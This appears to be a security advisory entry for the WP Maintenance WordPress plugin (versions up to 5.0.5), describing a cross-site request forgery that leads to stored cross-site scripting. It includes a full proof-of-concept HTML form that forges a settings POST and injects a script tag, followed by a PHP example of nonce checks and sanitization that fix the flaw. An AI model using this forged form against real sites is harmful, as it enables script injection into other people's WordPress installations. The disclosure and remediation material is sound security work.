wpexploit | Chloe Chamberland | WPEX-ID:D4ABE672-91FB-4F1C-8970-3D600AA8513F
History: Nov 19, 2019 - 12:00 a.m.

WP Maintenance <= 5.0.5 - Cross-Site Request Forgery to Stored Cross-Site Scripting

EPSS: 0.004
Percentile: 72.8%

The plugin's form submissions have no nonce protection, which leads to CSRF, and there is no input or output sanitization, which allows stored XSS when the CSRF is exploited.

<html>
  <body>
    <form action="http://URL/wp-admin/admin.php?page=wp-maintenance" method="POST">
      <input type="hidden" name="action" value="update_general" />
      <input type="hidden" name="wp_maintenance_active" value="1" />
      <input type="hidden" name="wp_maintenance_settings[titre_maintenance]" value="Whatever" />
      <input type="hidden" name="wp_maintenance_settings[text_maintenance]" value="Come back quickly!" />
      <input type="hidden" name="wp_maintenance_settings[text_bt_maintenance]" value="" />
      <input type="hidden" name="wp_maintenance_settings[add_wplogin]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[add_wplogin_title]" value="" />
      <input type="hidden" name="wp_maintenance_settings[enable_seo]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[seo_title]" value="" />
      <input type="hidden" name="wp_maintenance_settings[seo_description]" value="" />
      <input type="hidden" name="wp_maintenance_settings[favicon]" value="" />
      <input type="hidden" name="wp_maintenance_settings[code_analytics]" value="" />
      <input type="hidden" name="wp_maintenance_settings[domain_analytics]" value="URL" />
      <input type="hidden" name="wp_maintenance_social_options[enable]" value="0" />
      <input type="hidden" name="wp_maintenance_social_options[texte]" value="" />
      <input type="hidden" name="wp_maintenance_social[facebook]" value="" />
      <input type="hidden" name="wp_maintenance_social[twitter]" value="" />
      <input type="hidden" name="wp_maintenance_social[linkedin]" value="" />
      <input type="hidden" name="wp_maintenance_social[flickr]" value="" />
      <input type="hidden" name="wp_maintenance_social[youtube]" value="" />
      <input type="hidden" name="wp_maintenance_social[pinterest]" value="" />
      <input type="hidden" name="wp_maintenance_social[vimeo]" value="" />
      <input type="hidden" name="wp_maintenance_social[instagram]" value="" />
      <input type="hidden" name="wp_maintenance_social[google_plus]" value="" />
      <input type="hidden" name="wp_maintenance_social[about_me]" value="" />
      <input type="hidden" name="wp_maintenance_social[soundcloud]" value="" />
      <input type="hidden" name="wp_maintenance_social[skype]" value="" />
      <input type="hidden" name="wp_maintenance_social[tumblr]" value="" />
      <input type="hidden" name="wp_maintenance_social[blogger]" value="" />
      <input type="hidden" name="wp_maintenance_social[paypal]" value="" />
      <input type="hidden" name="wp_maintenance_social_options[size]" value="32" />
      <input type="hidden" name="wp_maintenance_social_options[style]" value="style1" />
      <input type="hidden" name="wp_maintenance_social_options[position]" value="bottom" />
      <input type="hidden" name="wp_maintenance_social_options[align]" value="center" />
      <input type="hidden" name="wp_maintenance_social_options[theme]" value="" />
      <input type="hidden" name="wp_maintenance_social_options[reset]" value="0" />
      <input type="hidden" name="wp_maintenance_settings[newletter]" value="1" />
      <input type="hidden" name="wp_maintenance_settings[title_newletter]" value="<script>alert(1)</script>" />
      <input type="hidden" name="wp_maintenance_settings[type_newletter]" value="shortcode" />
      <input type="hidden" name="wp_maintenance_settings[code_newletter]" value="" />
      <input type="hidden" name="wp_maintenance_settings[iframe_newletter]" value="" />
      <input type="hidden" name="submit" value="Save Changes" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>
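
The two controls the description reports as missing, nonce verification on the settings POST and sanitization and escaping of the stored values, look like this in a WordPress settings handler. This is an added example, not the WP Maintenance plugin's own code or its actual patch; the `wpm_example_*` function and nonce names are hypothetical, and the `wp_maintenance_settings` option name is assumed from the form field names above.

```php
<?php
// Added example: hypothetical names, not the WP Maintenance plugin's code.
const WPM_EXAMPLE_ACTION = 'wpm_example_update_general'; // nonce action (assumed name)
const WPM_EXAMPLE_FIELD  = 'wpm_example_nonce';          // nonce field (assumed name)

// Render: the settings form carries a per-user, per-action nonce.
function wpm_example_render_form() {
    $settings = get_option( 'wp_maintenance_settings', array() ); // option name assumed
    $title    = isset( $settings['title_newletter'] ) ? $settings['title_newletter'] : '';
    echo '<form method="post">';
    wp_nonce_field( WPM_EXAMPLE_ACTION, WPM_EXAMPLE_FIELD );
    echo '<input type="hidden" name="action" value="update_general" />';
    // esc_attr() keeps a stored value from breaking out of the attribute.
    echo '<input type="text" name="wp_maintenance_settings[title_newletter]" value="'
        . esc_attr( $title ) . '" />';
    submit_button();
    echo '</form>';
}

// Save: check capability and nonce before any stored setting is touched.
function wpm_example_save_settings() {
    if ( ! isset( $_POST['action'] ) || 'update_general' !== $_POST['action'] ) {
        return;
    }
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.', '', array( 'response' => 403 ) );
    }
    // Ends the request if the nonce is missing or invalid, so a forged
    // cross-site POST like the form above never reaches update_option().
    check_admin_referer( WPM_EXAMPLE_ACTION, WPM_EXAMPLE_FIELD );

    $raw = array();
    if ( isset( $_POST['wp_maintenance_settings'] ) && is_array( $_POST['wp_maintenance_settings'] ) ) {
        $raw = wp_unslash( $_POST['wp_maintenance_settings'] );
    }
    $clean = array();
    foreach ( $raw as $key => $value ) {
        // sanitize_text_field() strips tags; a field that must hold markup
        // would need wp_kses() with an explicit allow-list instead.
        $clean[ sanitize_key( $key ) ] = sanitize_text_field( $value );
    }
    update_option( 'wp_maintenance_settings', $clean );
}
add_action( 'admin_init', 'wpm_example_save_settings' );

// Output: escape again where the value is printed on the public page.
function wpm_example_newsletter_title() {
    $settings = get_option( 'wp_maintenance_settings', array() );
    $title    = isset( $settings['title_newletter'] ) ? $settings['title_newletter'] : '';
    echo '<h3>' . esc_html( $title ) . '</h3>';
}
```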
